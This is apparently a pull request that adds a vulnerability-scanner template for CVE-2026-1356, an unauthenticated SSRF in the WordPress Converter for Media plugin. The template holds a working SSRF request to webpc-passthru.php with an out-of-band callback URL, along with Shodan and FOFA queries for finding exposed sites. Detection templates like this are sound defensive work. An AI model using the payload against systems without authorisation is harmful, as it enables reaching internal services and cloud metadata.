### PR TITLE
Add CVE-2026-1356: WordPress Converter for Media Unauthenticated SSRF

### DIFF
--- a/http/cves/2026/CVE-2026-1356.yaml
+++ b/http/cves/2026/CVE-2026-1356.yaml
@@ -1,0 +1,69 @@
+id: CVE-2026-1356
+
+info:
+  name: WordPress Converter for Media <= 6.5.1 - Unauthenticated SSRF
+  author: iamnoooob,pdresearch
+  severity: high
+  description: |
+    The Converter for Media plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 6.5.1 via the PassthruLoader::load_image_source function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.
+  impact: |
+    Unauthenticated attackers can make arbitrary HTTP requests from the server to internal or external services, potentially accessing cloud metadata endpoints, internal APIs, or performing port scanning.
+  remediation: |
+    Update the Converter for Media plugin to version 6.5.2 or later.
+  reference:
+    - https://patchstack.com/database/wordpress/plugin/webp-converter-for-media/vulnerability/wordpress-converter-for-media-optimize-images-convert-webp-avif-plugin-6-5-1-unauthenticated-server-side-request-forgery-via-src-vulnerability
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/188d812c-2955-4b0c-ae1c-b42c0f60b73b
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-1356
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cve-id: CVE-2026-1356
+    cwe-id: CWE-918
+    cpe: cpe:2.3:a:developer-flavor:converter_for_media:*:*:*:*:*:wordpress:*:*
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: developer-flavor
+    product: converter_for_media
+    framework: wordpress
+    shodan-query: http.html:"/wp-content/plugins/webp-converter-for-media"
+    fofa-query: body="/wp-content/plugins/webp-converter-for-media"
+  tags: cve,cve2026,wordpress,wp-plugin,webp-converter-for-media,ssrf,oast,unauth,vuln
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body, "/wp-content/plugins/webp-converter-for-media")'
+          - 'status_code == 200'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        GET /wp-content/webpc-passthru.php?src=http://{{interactsh-url}}/test.jpg&nocache=1 HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+
+      - type: status
+        status:
+          - 200
+          - 301
+          - 302
+          - 400
+          - 404
+          - 500
+        condition: or


### PR DESCRIPTION
Adds detection template for CVE-2026-1356 - Server-Side Request Forgery in WordPress Converter for Media plugin via PassthruLoader image passthrough endpoint.

- **Vulnerability**: Unauthenticated SSRF via `PassthruLoader::load_image_source` function
- **Affected**: Converter for Media (webp-converter-for-media) <= 6.5.1
- **Fixed**: Version 6.5.2
- **CVSS**: 7.2 High (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N)
- **Detection**: OAST-based callback via `webpc-passthru.php?src=` endpoint
- **Pre-check**: Verifies plugin presence before sending SSRF payload

References:
- https://patchstack.com/database/wordpress/plugin/webp-converter-for-media/vulnerability/wordpress-converter-for-media-optimize-images-convert-webp-avif-plugin-6-5-1-unauthenticated-server-side-request-forgery-via-src-vulnerability
- https://www.wordfence.com/threat-intel/vulnerabilities/id/188d812c-2955-4b0c-ae1c-b42c0f60b73b
- https://nvd.nist.gov/vuln/detail/CVE-2026-1356